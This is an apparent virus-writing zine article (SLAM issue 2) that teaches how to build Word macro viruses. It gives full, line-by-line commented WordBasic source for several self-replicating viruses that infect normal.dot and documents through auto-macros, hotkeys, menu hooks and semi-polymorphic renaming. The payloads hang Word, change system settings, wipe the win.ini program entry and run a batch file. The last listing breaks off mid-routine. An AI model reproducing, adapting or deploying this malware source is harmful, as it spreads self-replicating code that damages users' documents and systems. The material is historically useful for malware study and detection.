Copy Link
Add to Bookmark
Report
SLAM2.004: Different kinds of Macro Viruses
DiFFeRenT KiNdS oF wOrD MaCrO ViRuSeS
At this time I will show you some different kinds of macro viruses.
The first macro virus in the wild (Concept) and of course the DMV macro uses the AutoMacro function. AutoMacros are AutoOpen, AutoClose, AutoNew, AutoExit and AutoExec. OK, here is a simple example, how a AUTOMACRO VIRUS works.
All comments starts with '...
Virus: HARKONE
---- Begin of macro virus ---------------------------------------------------
MACRO: AutoOpen 'main virus macro.
~~~~~~~~~~~~~~~
Sub MAIN 'macro starts here.
On Error Goto Finish 'Error Handler
DisableAutoMacros 0 'Set DisableAutoMacros
'Off.
J$ = LCase$(Right$(MacroFileName$(MacroName$(0)), 10)) 'where is the macro?
If J$ = "normal.dot" Then 'normal.dot, then
If VI = 1 Then 'if the active file is
'allready infected
Goto Finish 'go to Finish
Else 'or if not
InfectDOC 'do it!
End If 'And if the macro is
Else 'in the active file
If VI2 = 1 Then 'then, if the file is
'allready infected
Goto Finish 'go to Finish.
Else 'or, if not
InfectGlobal 'infect normal.dot.
End If
End If
Finish: 'label Finish
Call HARKONE 'run the HARKONE MACRO
End Sub 'end.
Function VI 'Function to check, if
'the file is allready
VI = 0 'infected. VI = 0
If CountMacros(1) > 0 Then 'Count all macros in
For i = 1 To CountMacros(1) 'the active file (=>1)
If MacroName$(i, 1) = "HARKONE" Then 'If there the macro
VI = 1 'HARKONE then VI = 1
End If 'if not
Next i 'search now again
End If
End Function 'end.
Function VI2 'Function to check, if
'normal.dot is allready
VI2 = 0 'infected. VI2 = 0
If CountMacros(0) > 0 Then 'Count all macros in
For i = 1 To CountMacros(0) 'normal.dot (=>0)
If MacroName$(i, 0) = "HARKONE" Then 'If there the macro
VI2 = 1 'HARKONE then VI2 = 1
End If 'if not
Next i 'search now again
End If
End Function 'end.
Sub InfectDOC 'This is the code to
'infect the active
FileSaveAs .Format = 1 'file. At first save
'the active file as a
'template and
MacroCopy "Global:AutoClose", FileName$() + ":AutoOpen" 'copy the AutoClose
'macro to the active
'file with the new
'name AutoOpen. And
MacroCopy "Global:HARKONE", FileName$() + ":HARKONE" 'now the same with the
'HARKONE macro.
FileSaveAll 1, 1 'At last save all.
End Sub 'end.
Sub InfectGlobal 'Code to infect
'normal.dot.
MacroCopy FileName$() + ":AutoOpen", "Global:AutoClose" 'Copy the AutoOpen
'macro to normal.dot
'with the new name
'AutoClose. And again
MacroCopy FileName$() + ":HARKONE", "Global:HARKONE" 'the same with the
'HARKONE macro.
FileSaveAll 1, 0 'Save all now.
End Sub 'end.
MACRO: HARKONE 'payload macro.
~~~~~~~~~~~~~~
Sub MAIN 'code starts here.
If Day(Now()) = 1 And Month(Now()) = 6 Then 'if today is 01/06/xx
FileNew 'then create a new
ToggleFull 'document and maximize
DocMaximize 'the screen + document
Font "Imprint MT Shadow" 'Use Font "I.."
FontSize 60 'Size 60
Bold 'Bold
Insert "HARKONE" 'Insert now the word
'HARKONE.
StartOfLine 'Go to top of document
CharRight 1, 1 'mark the first letter
FormatFont .Points = "48", .Color = 6 'and make it red.
EndOfLine 'Go to end of document
InsertPara '....
InsertPara
FontSize 48
Insert "NJ [SLAM]"
HangOn: 'label HangOn
Goto HangOn 'goto HangOn
End If
End Sub 'end.
'I know it's a quite lame payload, but easy to understand.
---- End of macro virus -----------------------------------------------------
The most viruses in the wild uses the AutoMacro Option.
The viruses copy their macros to the global macro file NORMAL.DOT and infect then every other document, which will open.
Another kind of macro viruses are the DIRECT ACTION virii's.
Here is again a simple example:
Virus: ORDO
---- Begin of macro virus ---------------------------------------------------
macro: AutoOpen 'main virus macro.
~~~~~~~~~~~~~~~
Sub MAIN 'macro starts here.
ScreenUpdating 'ScreanUpdating Off
DisableAutoMacros 'Disable AutoMacros.
InfectedFile$ = FileName$() 'InfectedFile$ =
'the active file.
For ORDO = 1 To CountFiles() 'Count the filenames
'in the FileList.
If Files$(FileName$(ORDO)) <> "" Then 'If there a filename
FileList ORDO 'open the file.
NewFile$ = FileName$() 'NewFile$ = the new
'opened file.
If InfectedFile$ <> NewFile$ Then 'If NewFile$ is not
'InfectedFile$ then
If VI = 0 Then 'if this file isn't
'infected,
FileSaveAs .Format = 1 'save it as a template
'and copy the aUtOoPeN
'and ORDO macro from
'InfectedFile$ to
'NewFile$
MacroCopy InfectedFile$ + ":aUtOoPeN", NewFile$ + ":"
MacroCopy InfectedFile$ + ":ORDO", NewFile$ + ":"
End If
FileClose 1 'close + save the file
End If
End If
Next 'search now a new file
a$ = AppInfo$(2) : a$ = Left$(a$, 1) : a = Val(a$) 'Is this WinWord 7.0?
If a = 7 Then 'if yes then
If Day(Now()) = 2 And Month(Now()) = 7 Then 'if today 02/07/xx
ORDO 'run the macro: ORDO
End If
End If
DisableAutoMacros 0 'disable it.
End Sub
Function VI 'Function to check, if
'the file is allready
VI = 0 'infected. VI = 0
If CountMacros(1) > 0 Then 'Count all macros in
For i = 1 To CountMacros(1) 'the active file.
If MacroName$(i, 1) = "ORDO" Then 'If there the ORDO
VI = 1 'macro then VI = 1
End If
Next i 'If not search again.
End If
End Function
macro: ORDO 'payload macro
~~~~~~~~~~~
Declare Function GetWindowsDirectoryA Lib "Kernel32"(lpBuffer As String,
nSize As Long) As Long 'Function to get
'the windows path.
Sub MAIN
Windir$ = String$(255, " ") : nSize = 255 'Windir$ = win path
WordLong = GetWindowsDirectoryA(WinDir$, nSize) 'Get size of Windir$
IniName$ = windir$ + "\" + "CONTROL.INI" 'IniName$ = path to
'control.ini
a$ = "O.R.D.O NJ [SLAM]" 'a$ = "O...."
b$ = Windir$ + "\SYSTEM\MARQUEE.SCR" 'b$ = path to the
'screensaver.
c$ = Windir$ + "\SYSTEM.INI" 'c$ = path to system.ini
'Set now the time, when the Screensaver should be active.
'(60 seconds)
SetPrivateProfileString "HKEY_CURRENT_USER\Control Panel\desktop",
"ScreenSaveTimeOut", "60", ""
SetPrivateProfileString "HKEY_CURRENT_USER\Control Panel\desktop",
"ScreenSaveActive", "60", ""
'Now insert the new text into control.ini
SetPrivateProfileString "Screen Saver.Marquee", "Text", a$, IniName$
'and use the ScreenSaver "Marquee".
SetPrivateProfileString "boot", "SCRNSAVE.EXE", b$, c$
End Sub 'end.
'Now after the next start of Windows will show the Screensaver
'Marquee every minute the message: O.R.D.O by Nightmare Joker (SLAM).
---- End of macro virus ----------------------------------------------------
At the moment there are only three or four viruses, which uses this method. I think it's better than the method before, but of course a little bit more difficult. The big advantage is that the user can mark normal.dot as read-only and has no chance to stop the virus, too. :)
Now another method. You can use ShortCuts to start the virus macro.
So, if the user will push e.g. the "e" button, then the virus will become active and try to infect the active file or normal.dot.
And again a simple example.
Virus: DONOSO (created with the Demolition Kit)
---- Begin of macro virus --------------------------------------------------
macro: DONOSO1
~~~~~~~~~~~~~~
Sub MAIN 'macro starts here.
On Error Goto Finish 'Error Handler
'Link the macro "DONOSO1" with the Backspace key.
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = "DONOSO1", .Add, .Context = 0
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = "DONOSO1", .Add, .Context = 1
'And now link the macro "DONOSO2" with the key "i".
ToolsCustomizeKeyboard .KeyCode = 73, .Category = 2, .Name = "DONOSO2", .Add, .Context = 0
ToolsCustomizeKeyboard .KeyCode = 73, .Category = 2, .Name = "DONOSO2", .Add, .Context = 1
VM1$ = WindowName$() + ":DONOSO1" 'VM1$ = ...
VM2$ = WindowName$() + ":DONOSO2" 'I think you see it.
';-))
If VInstalled = 1 Then 'OK, if the active
'file is infected
Goto Finish 'then go to Finish
Else 'or if not
On Error Resume Next 'Set Error Handler.
FileSaveAs .Format = 1 'Save a active file
'as a template and
MacroCopy "Global:DONOSO1", VM1$ 'copy macro DONOSO1
MacroCopy "Global:DONOSO2", VM2$ 'and DONOSO2 to the
'active file.
FileSaveAll 1, 0 'Save now all.
End If
Finish: 'Label Finish.
A$ = FileName$() 'a$ = active file.
If A$ = "" Then 'If there not a active
Goto Finito 'file, go to Finito
Else 'or
Insert " " 'insert a space.
End If
Finito: 'Label Finito
If Month(Now()) = 8 And Day(Now()) = 3 Then 'If today 03/08/xx,
Payload 'start the payload,
Else 'or if not
Goto EndOne 'go to EndOne.
End If
EndOne: 'Label EndOne
End Sub 'end.
Function VInstalled 'Function to check
'if the active file
'is allready infected.
VInstalled = 0 'VInstalled = 0
If CountMacros(1) > 0 Then 'Count all macros in
For i = 1 To CountMacros(1) 'the active file (=>1)
If MacroName$(i, 1) = "DONOSO1" Then
'If there the DONOSO1
VInstalled = 1 'macro then VI.. = 1
End If
Next i 'if not, search again
End If
End Function 'end.
Sub Payload
REM A Virus from Nightmare Joker's Demolition Kit! 'quite good kit! ;-))
On Error Resume Next 'Set Error Handler
ToolsCustomizeKeyboard .KeyCode = 27, .Category = 1, .Name = "Abbrechen", .Remove, .Context = 0
SendKeys "^" + "%" + "-" 'start the
'"winword murder"! :))
End Sub 'end.
macro : DONOSO2
~~~~~~~~~~~~~~~
Sub MAIN 'macro starts here.
On Error Goto Finish 'Error Handler
'Link the macro "DONOSO1" with the Backspace key.
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = "DONOSO1", .Add, .Context = 0
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = "DONOSO1", .Add, .Context = 1
'And now link the macro "DONOSO2" with the key "i".
ToolsCustomizeKeyboard .KeyCode = 73, .Category = 2, .Name = "DONOSO2", .Add, .Context = 0
ToolsCustomizeKeyboard .KeyCode = 73, .Category = 2, .Name = "DONOSO2", .Add, .Context = 1
VM1$ = WindowName$() + ":DONOSO1" 'and ....
VM2$ = WindowName$() + ":DONOSO2" '........
NJ$ = MacroFileName$("DONOSO1") 'NJ$= name of the file,
'which is infected.
F$ = FileNameInfo$(NJ$, 5) 'This is the same, but
'without the path.
If VInstalled = 1 Then 'If normal.dot is
Goto Finish 'infected,go to Finish
Else 'or
On Error Resume Next 'Set Error Handler.
MacroCopy VM1$, "Global:DONOSO1" 'Copy the macros
MacroCopy VM2$, "Global:DONOSO2" 'to normal.dot and
FileSaveAll 1, 1 'save all.
End If
Finish: 'Label Finish
A$ = FileName$() 'a$ = active file.
If A$ = "" Then 'If there no file
Goto Finito 'go to Finito
Else 'or
Insert "i" 'insert a "i"
End If
Finito: 'Label Finito.
If Month(Now()) = 8 And Day(Now()) = 3 Then 'If today 03/08/xx
Payload 'start the payload
Else 'or if not
Goto EndOne 'go to EndOne
End If
EndOne: 'Label EndOne
End Sub 'end.
Function VInstalled 'Function to check, if
'normal.dot is allready
VInstalled = 0 'infected. VIn... = 0
If CountMacros(0) > 0 Then 'Count all macros in
For i = 1 To CountMacros(0) 'normal.dot (=>0)
If MacroName$(i, 0) = "DONOSO1" Then
VInstalled = 1 'If there the DONOSO1
'macro then VIn.. = 1
End If
Next i 'if not, search again
End If
End Function 'end.
---- End of macro virus ----------------------------------------------------
The chance to spread this virus isn't very big, because the user will normally only read a new text file and the virus can only become active if the user hit any "infected" keys. But I think a combination between the AutoMacro and this ShortCut method could be not bad.
A advantage of the ShortCut method is the possibility to change the macro- name at every infection. (to make semi-polymorphic macro virii's)
OK, here is a example of a semi-polymorphic macro virus.
Virus: C.O.E. (again created with the Demolition Kit)
---- Begin of macro virus --------------------------------------------------
macro: BIAWFPJU 'Macro name will
~~~~~~~~~~~~~~~ 'change at every
'infection.
Sub MAIN 'Macro starts here.
On Error Goto Done 'Error Handler.
A$ = FileName$() 'a$ = active file
If A$ = "" Then Goto Finish 'If there no active
'file, go to Finish.
If VInstalled = 0 Then 'If the active file
'isn't infected,
Run1 'start "Run1",
Run2 '"Run2",
RunPayload 'and "RunPayload"
FileSaveAll 1, 1 'at last save all.
Else 'Or if the active file
Goto Done 'is allready infected
End If 'go to Done.
Done: 'Label Done.
A$ = FileName$() 'a$ = active file
If A$ = "" Then 'If there no active
Goto Finish 'file go to Finish.
Else 'or
Insert "e" 'insert a "e"
End If
Finish: 'Label Finish
MsgBox "COE", - 8 'show message "COE"
End Sub 'end.
Sub Run1 'Function to generate
'a new name and to
'copy the first macro.
X$ = Fun$(F$, G$, H$, J$) 'Get four letters (X$).
Y$ = Fun$(F$, G$, H$, J$) 'and again (Y$).
Z$ = X$ + Y$ 'Z$ = new name
R1$ = GetDocumentVar$("VirNameDoc") 'Get the old macro
CO$ = FileName$() + ":" + R1$ 'name and copy it
MacroCopy CO$, "Global:" + Z$ 'to normal.dot. Save
SetProfileString "Intl", "Info2", Z$ 'macro name (win.ini).
'Link the macro with
'the Backspace key.
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = Z$, .Add, .Context = 0
End Sub 'end.
Sub Run2
X$ = Fun$(F$, G$, H$, J$) 'Get four letters (X$)
Y$ = Fun$(F$, G$, H$, J$) 'and again (Y$).
Z$ = X$ + Y$ 'Z$ = new name
R2$ = GetDocumentVar$("VirName") 'Get the old macro
OC$ = FileName$() + ":" + R2$ 'name and copy it
MacroCopy OC$, "Global:" + Z$ 'to normal.dot. Save
SetProfileString "Intl", "Info1", Z$ 'macro name (win.ini).
'Link the macro with
'the key "e".
ToolsCustomizeKeyboard .KeyCode = 69, .Category = 2, .Name = Z$, .Add, .Context = 0
End Sub 'end.
Sub RunPayload
X$ = Fun$(F$, G$, H$, J$) 'Get now four letters
Y$ = Fun$(F$, G$, H$, J$) 'and the same again.
Z$ = X$ + Y$ 'Z$ = new name
R3$ = GetDocumentVar$("VirNamePayload") 'Get again the old
'macro name and
OCO$ = FileName$() + ":" + R3$ 'copy it to
MacroCopy OCO$, "Global:" + Z$ 'normal.dot.
SetProfileString "Intl", "Info3", Z$ 'Save the macro name.
'(win.ini)
End Sub 'end
Function VInstalled 'Function to check if
'the active file is
'allready infected.
CC$ = GetProfileString$("Intl", "Info1") 'Get the macro name
VInstalled = 0 'Vinstalled = 0
If CountMacros(0) > 0 Then 'Count all macros in
For i = 1 To CountMacros(0) 'normal.dot (=>0).
If MacroName$(i, 0) = CC$ Then 'If there the virus
VInstalled = 1 'macro then VI.. = 1
End If
Next i 'search again
End If
End Function 'end.
Function Fun$(F$, G$, H$, J$) 'Function to generate
'a new macro name.
One = 1169 'One = 1169
Two = 9294 'Two = 9294
Num = Int(Rnd() * (Two - One) + One) 'Get now a new numba.
A$ = Str$(Num) 'Translate it into a
A$ = LTrim$(A$) 'string and remove the
'space.
B$ = Mid$(A$, 1, 1) 'b$ = the first, c$ =
C$ = Mid$(A$, 2, 1) 'the second and ...
D$ = Mid$(A$, 3, 1) 'character.
E$ = Mid$(A$, 4, 1)
If B$ = "1" Then F$ = "A" 'If b$ = 1 then F$
If B$ = "2" Then F$ = "B" '= A
If B$ = "3" Then F$ = "C" 'and so on...
If B$ = "4" Then F$ = "D"
If B$ = "5" Then F$ = "E"
If B$ = "6" Then F$ = "F"
If B$ = "7" Then F$ = "G"
If B$ = "8" Then F$ = "H"
If B$ = "9" Then F$ = "I"
If B$ = "0" Then F$ = "J"
If C$ = "1" Then G$ = "H"
If C$ = "2" Then G$ = "I"
If C$ = "3" Then G$ = "J"
If C$ = "4" Then G$ = "K"
If C$ = "5" Then G$ = "L"
If C$ = "6" Then G$ = "M"
If C$ = "7" Then G$ = "N"
If C$ = "8" Then G$ = "O"
If C$ = "9" Then G$ = "P"
If C$ = "0" Then G$ = "Q"
If D$ = "1" Then H$ = "A"
If D$ = "2" Then H$ = "B"
If D$ = "3" Then H$ = "C"
If D$ = "4" Then H$ = "D"
If D$ = "5" Then H$ = "E"
If D$ = "6" Then H$ = "F"
If D$ = "7" Then H$ = "G"
If D$ = "8" Then H$ = "H"
If D$ = "9" Then H$ = "I"
If D$ = "0" Then H$ = "J"
If E$ = "1" Then J$ = "R"
If E$ = "2" Then J$ = "S"
If E$ = "3" Then J$ = "T"
If E$ = "4" Then J$ = "U"
If E$ = "5" Then J$ = "V"
If E$ = "6" Then J$ = "W"
If E$ = "7" Then J$ = "X"
If E$ = "8" Then J$ = "Y"
If E$ = "9" Then J$ = "Z"
If E$ = "0" Then J$ = "Q"
Fun$ = F$ + G$ + H$ + J$ 'Fun$ = the new name
End Function 'end.
macro: BIDQHKJS
~~~~~~~~~~~~~~~
Sub MAIN
On Error Goto Finish 'Error Handler
A$ = FileName$() 'a$ = active file
If A$ = "" Then Goto Finish 'If there no active
'file then go to Finish
CO$ = GetProfileString$("Intl", "Info1") 'Get macro name
OC$ = GetProfileString$("Intl", "Info2") 'one, two
OCO$ = GetProfileString$("Intl", "Info3") 'and three.
If VInstalled = 1 Then 'If the active file
'is allready infected
Goto Finish 'goto Finish,
Else 'or if not:
On Error Resume Next 'Set Error Handler,
FileSaveAs .Format = 1 'save the active file
'as a template,
Run1 'call Run1,
Run2 'Run2 and
RunPayload 'RunPayload.
FileSaveAll 1, 0 'At last save all.
End If
Finish: 'Label Finish.
A$ = FileName$() 'a$ = active file.
If A$ = "" Then 'If there no active
Goto Finito 'file then go to Finito
Else 'or
Insert " " 'insert a space.
End If
Finito: 'Label Finito.
If Month(Now()) = 9 And Day(Now()) = 4 Then 'If today 04/09/xx
Goto Payload 'go to "Payload"
Else 'or if not
Goto No 'go to "No".
End If
Payload: 'Label Payload.
AK$ = GetProfileString$("Intl", "Info3") 'Get the macro name
ToolsMacro .Name = AK$, .Run, .Show = 0, .Description = "", .NewName = ""
'and start the macro.
No: 'Label "No"
End Sub 'end.
Sub Run1
X$ = Fun$(F$, G$, H$, J$) 'Get four characters
Y$ = Fun$(F$, G$, H$, J$) 'and again.
Z$ = X$ + Y$ 'Z$ = new name
CO$ = GetProfileString$("Intl", "Info2") 'Get the first macro
MacroCopy "Global:" + CO$, FileName$() + ":" + Z$ 'name and copy the
'macro to the active
SetDocumentVar "VirName", Z$ 'file. Save the
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, 'macro name and link
.Name = Z$, .Add, .Context = 1 'the macro with the
End Sub 'Backspace key. end.
Sub Run2
X$ = Fun$(F$, G$, H$, J$) 'and so on....
Y$ = Fun$(F$, G$, H$, J$)
Z$ = X$ + Y$
OC$ = GetProfileString$("Intl", "Info1")
MacroCopy "Global:" + OC$, FileName$() + ":" + Z$
SetDocumentVar "VirNameDoc", Z$
ToolsCustomizeKeyboard .KeyCode = 69, .Category = 2, .Name = Z$, .Add, .Context = 1
End Sub
Sub RunPayload
X$ = Fun$(F$, G$, H$, J$)
Y$ = Fun$(F$, G$, H$, J$)
Z$ = X$ + Y$
OCO$ = GetProfileString$("Intl", "Info3")
MacroCopy "Global:" + OCO$, FileName$() + ":" + Z$
SetDocumentVar "VirNamePayload", Z$
End Sub
Function VInstalled
On Error Resume Next
CC$ = GetDocumentVar$("VirNameDoc")
VInstalled = 0
If CountMacros(1) > 0 Then
For i = 1 To CountMacros(1)
If MacroName$(i, 1) = CC$ Then
VInstalled = 1
End If
Next i
End If
End Function
Function Fun$(F$, G$, H$, J$)
One = 1169
Two = 9294
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
B$ = Mid$(A$, 1, 1)
C$ = Mid$(A$, 2, 1)
D$ = Mid$(A$, 3, 1)
E$ = Mid$(A$, 4, 1)
If B$ = "1" Then F$ = "A"
If B$ = "2" Then F$ = "B"
If B$ = "3" Then F$ = "C"
If B$ = "4" Then F$ = "D"
If B$ = "5" Then F$ = "E"
If B$ = "6" Then F$ = "F"
If B$ = "7" Then F$ = "G"
If B$ = "8" Then F$ = "H"
If B$ = "9" Then F$ = "I"
If B$ = "0" Then F$ = "J"
If C$ = "1" Then G$ = "H"
If C$ = "2" Then G$ = "I"
If C$ = "3" Then G$ = "J"
If C$ = "4" Then G$ = "K"
If C$ = "5" Then G$ = "L"
If C$ = "6" Then G$ = "M"
If C$ = "7" Then G$ = "N"
If C$ = "8" Then G$ = "O"
If C$ = "9" Then G$ = "P"
If C$ = "0" Then G$ = "Q"
If D$ = "1" Then H$ = "A"
If D$ = "2" Then H$ = "B"
If D$ = "3" Then H$ = "C"
If D$ = "4" Then H$ = "D"
If D$ = "5" Then H$ = "E"
If D$ = "6" Then H$ = "F"
If D$ = "7" Then H$ = "G"
If D$ = "8" Then H$ = "H"
If D$ = "9" Then H$ = "I"
If D$ = "0" Then H$ = "J"
If E$ = "1" Then J$ = "R"
If E$ = "2" Then J$ = "S"
If E$ = "3" Then J$ = "T"
If E$ = "4" Then J$ = "U"
If E$ = "5" Then J$ = "V"
If E$ = "6" Then J$ = "W"
If E$ = "7" Then J$ = "X"
If E$ = "8" Then J$ = "Y"
If E$ = "9" Then J$ = "Z"
If E$ = "0" Then J$ = "Q"
Fun$ = F$ + G$ + H$ + J$ '....
End Function 'end.
macro: AIHYFNFR 'payload macro
~~~~~~~~~~~~~~~
Sub MAIN
SetProfileString "windows", "Program", "" 'remove something from
End Sub 'win.ini ;)
'Really nasty payload. After the next start of Windows won't work any program.
---- End if macro virus -----------------------------------------------------
This virus will change now the macro names at every new infection.
So, it's a semi-polymorphic macro virus.
The first virus, which use menu macros was Nuclear.
So, if the user push the menu button e.g. "FileExit" then the virus will become active, infect the document and close it.
And now a easy example of this infection method:
Virus: SUNBEAM
---- Begin of macro virus --------------------------------------------------
MACRO: DocClose
~~~~~~~~~~~~~~~
Sub MAIN 'macro starts here.
If CountMacros(0) > 0 Then 'Count all macros in
For i = 1 To CountMacros(0) 'normal.dot. (=>0)
If MacroName$(i, 0) = "SUNBEAM" Then 'If there the macro
Installed = 1 'SUNBEAM then I.. = 1
End If
Next i 'If not, search again
End If
If Installed = 0 Then 'If normal.dot isn't
'infected, then copy
MacroCopy WindowName$() + ":SUNBEAM","Global:SUNBEAM" 'the macros SUNBEAM,
MacroCopy WindowName$() + ":FileOpen","Global:FileOpen" 'FileOpen and DocClose
MacroCopy WindowName$() + ":DocClose","Global:DocClose" 'to normal.dot.
FileSaveAll 1, 0 'At last save all.
End If
Finish: 'Label Finish.
SUNBEAM 'Run macro SUNBEAM.
DocClose 'Close the active file
End Sub 'end.
macro: FileOpen
~~~~~~~~~~~~~~~
Sub MAIN '-\
Dim dlg As FileOpen ' \
GetCurValues dlg 'FileOpen commands
Dialog dlg ' /
FileOpen dlg '-/
On Error Goto Finish 'Error Handler
If CountMacros(1) > 0 Then 'Count all macros in
For i = 1 To CountMacros(1) 'the active file (=>1)
If MacroName$(i, 1) = "SUNBEAM" Then 'If there the macro
Installed = 1 'SUNBEAM then I.. = 1
End If
Next i 'search again
End If
If Installed = 0 Then 'If the active file
'isn't infected then
FileSaveAs .Format = 1 'save the active file
'as a template and
MacroCopy "Global:SUNBEAM",WindowName$() + ":SUNBEAM" 'copy the macros
MacroCopy "Global:FileOpen",WindowName$() + ":FileOpen" 'SUNBAM, FileOpen and
MacroCopy "Global:DocClose",WindowName$() + ":DocClose" 'DocClose to the
'active file. At last
FileSaveAll 1, 1 'save all.
End If
Finish: 'Label Finish.
SUNBEAM 'Run macro SUNBEAM.
End Sub 'end.
macro: SUNBEAM
~~~~~~~~~~~~~~
Sub MAIN 'macro starts here.
If Day(Now()) = 5 And Month(Now()) = 10 Then 'If today 05/10/xx
a$ = MacroFileName$("SUNBEAM") 'get the name of
b$ = Left$(a$, 3) 'HD. e.g. c:\ or d:\
Open b$ + "die.bat" For Output As #1 'Open the file die.bat
Print #1, "echo 123>clock$" 'Write it into the
Close #1 'file and close it.
Shell b$ + "die.bat", 0 'Run now die.bat.
End If
REM Thanks McNasty.
REM SUNBEAM by Nightmare Joker (SLAM)
End Sub 'end.
---- End of macro virus -----------------------------------------------------
This virus will now infect every document, which will open or close.
OK, the menu macro method is not bad, but has one big injury.
e.g. the SUNBEAM virus works only with the english version of word.
But of course, there are some possibilities to create a macro virus with menu macros, which will work with every word version. =8=))
And again a simple example:
Virus: ChAkA
---- Begin of macro virus ---------------------------------------------------
MACRO: AutoOpen
~~~~~~~~~~~~~~~
Sub MAIN 'macro starts here
REM ChAkA! Nightmare Joker [SLAM]
On Error Goto Finish 'Error Handler.
a$ = AppInfo$(16) 'Which version is it?
a$ = Left$(a$, 7) 'Use only the first
'7 characters of a$.
If a$ = "Deutsch" Then 'Is it the german
'version, then
M1$ = "Dateiôffnen" 'M1$ = Dateiôffnen
M2$ = "DokumentSchliessen" 'and M2$ = Doku... .
ElseIf a$ = "English" Then 'Or is it the english
M1$ = "FileOpen" 'version then M1$ =
M2$ = "DocClose" 'FileOpen and M2$ =
End If 'DocClose.
If CountMacros(0) > 0 Then 'Count now all macros
For i = 1 To CountMacros(0) 'in normal.dot. (=>0).
If MacroName$(i, 0) = "ChAkA" Then 'If there the macro
IV = 1 'ChAkA then IV = 1
End If
Next i 'search again
End If
If IV = 0 Then 'If normal.dot isn't
'infected, then
MacroCopy FileName$() + ":aUTOoPEN", "Global:ChAkA" 'copy it to normal.dot
ScreenUpdating 'Set ScreenUpdating off
ToolsMacro .Name = M1$, .Show = 1, .Edit 'Open now e.g. the
'FileOpen macro.
StartOfDocument '-
LineDown 1 '|
CharRight 10 '|
Insert Chr$(32) '| insert now the
StartOfDocument '| line:
LineDown 4 '| ChAkA.InfectDoc
EndOfLine '|
InsertPara '|
Insert "ChAkA.InfectDoc" '-
DocClose 1 'Save and close it.
ToolsMacro .Name = M2$, .Show = 1, .Edit 'Open now e.g. the
'DocClose macro.
StartOfDocument '- insert now again
EndOfLine '| the line:
InsertPara '| ChAkA.InfectDoc
Insert "ChAkA.InfectDoc" '-
DocClose 1 'save and close it.
FileSaveAll 1, 0 'Save all!
ScreenUpdating 'Set ScreenUpdating On
End If
Finish: 'Label Finish
End Sub 'end.
Sub InfectDoc
On Error Goto Venito 'Set Errorhandler.
If CountMacros(1) > 0 Then 'Count all macros in
For i = 1 To CountMacros(1) 'the active file.
If MacroName$(i, 1) = "aUTOoPEN" Then 'If there the macro
ID = 1 'aUTOoPEN then ID = 1
End If
Next i 'search again
End If
If ID = 0 Then 'If the active file
'isn't infected,
FileSaveAs .Format = 1 'save the active file
'as a template and
MacroCopy "Global:ChAkA", FileName$() + ":aUTOoPEN" 'copy the macro.
FileSaveAll 1, 1 'At last save all.
End If
End Sub 'end.
---- End of macro virus -----------------------------------------------------
So, this virus works now with the english and the german version of Word.
But this method it's a little bit circumstantial.
OK, if you want infect e.g. only the german, swedish or ? version of word then you can use this method.
Normally it would be better if we could get the names direct from the menus.
And of course, that's no problem, too. :-))
Look at the following virus:
Virus: CULT
---- Begin of macro virus ---------------------------------------------------
MACRO: AutoClose
~~~~~~~~~~~~~~~~
Function Name1$(h$) 'Function to get
'the first menu name.
a$ = MenuText$(0, 1, 0) 'a$ = e.g. in the
'english version of
'word now "&File"
x = Len(a$) + 1 : i = 1 : l = 1 'x = the length of a$.
Again: 'Label Again.
If i = x Then Goto GOON '-
d$ = Mid$(a$, i, 1) '|
If d$ = Chr$(38) Or d$ = Chr$(46) Or d$ = Chr$(32) Then '| now remove
i = i + 1 '| some character's
Goto Again '| that we don't need.
Else '| e.g. "." or "&"
e$ = e$ + d$ '|
i = i + 1 '|
Goto Again '|
End If '-
GOON: 'Label GOON
z = Len(e$) + 1 'z = length of e$ + 1
AA$ = MenuItemText$(e$, 0, 1, 0) 'AA$ = The first
'option in the "File"
'menu => "&New..."
y = Len(AA$) + 1 'y = length of AA$ + 1
Again2: 'Label Again2.
If l = y Then Goto Finish '-
K$ = Mid$(AA$, l, 1) '|
If K$ = "&" Or K$ = Chr$(46) Or K$ = Chr$(32) Or K$ = "-" Or K$ = "/" Then
l = l + 1 '|remove now again
Goto Again2 '|some characters
Else '|that we don't need.
CC$ = CC$ + K$ '|
l = l + 1 '|
Goto Again2 '|
End If '-
Finish: 'Label Finish.
h$ = Left$(CC$, z) 'h$ = "New"
Name1$ = e$ + h$ 'Name1$ = e$ (File)
'+ h$ (New)
End Function 'end.
Function Name2$(h$) 'Function to get the
a$ = MenuText$(0, 1, 0) 'second name.
x = Len(a$) + 1 : i = 1 : l = 1 '... code is the ...
Again: '... same as before ..
If i = x Then Goto GOON '...
d$ = Mid$(a$, i, 1)
If d$ = Chr$(38) Or d$ = Chr$(46) Or d$ = Chr$(32) Then
i = i + 1
Goto Again
Else
e$ = e$ + d$
i = i + 1
Goto Again
End If
GOON:
z = Len(e$) + 1
AA$ = MenuItemText$(e$, 0, 2, 0)
y = Len(AA$) + 1
Again2:
If l = y Then Goto Finish
K$ = Mid$(AA$, l, 1)
If K$ = "&" Or K$ = Chr$(46) Or K$ = Chr$(32) Or K$ = "-" Or K$ = "/" Then
l = l + 1
Goto Again2
Else
CC$ = CC$ + K$
l = l + 1
Goto Again2
End If
Finish:
h$ = Left$(CC$, z)
Name2$ = e$ + h$ '...
End Function 'end.
Sub MAIN
If CountMacros(0) > 0 Then 'Count all macros in
For o = 1 To CountMacros(0) 'normal.dot. (=>0)
If MacroName$(o, 0) = "cULT" Then 'If there the cULT
k = 1 'macro then k = 1
End If
Next o 'search again.
If k = 1 Then 'If normal.dot is
Goto Finish 'allready infected
Else 'then go to Finish.
MacroCopy WindowName$() + ":AuToClOsE", "Global:cULT" 'If not then
ScreenUpdating 'copy the macros.
m$ = Name1$(h$) : n$ = Name2$(h$) 'Get the menu names!
ToolsMacro .Name = m$, .Show = 1, .Edit 'Open the macros and
InsertCode 'insert the link to
ToolsMacro .Name = n$, .Show = 1, .Edit 'the main macro "cULT"
InsertCode
FileSaveAll 1, 1 'Save all.
ScreenUpdating 'Set ScreenUpdating Off
End If
Finish: 'Label Finish.
REM CULT! Nightmare Joker (SLAM)
End Sub 'end.
Sub InsertCode 'Routine to insert
StartOfDocument 'the code in the new
LineDown 1 'macro.
CharRight 10 'Insert the string
Insert Chr$(32) '"cULT.DoIt"
StartOfDocument '...
LineDown 4
EndOfLine
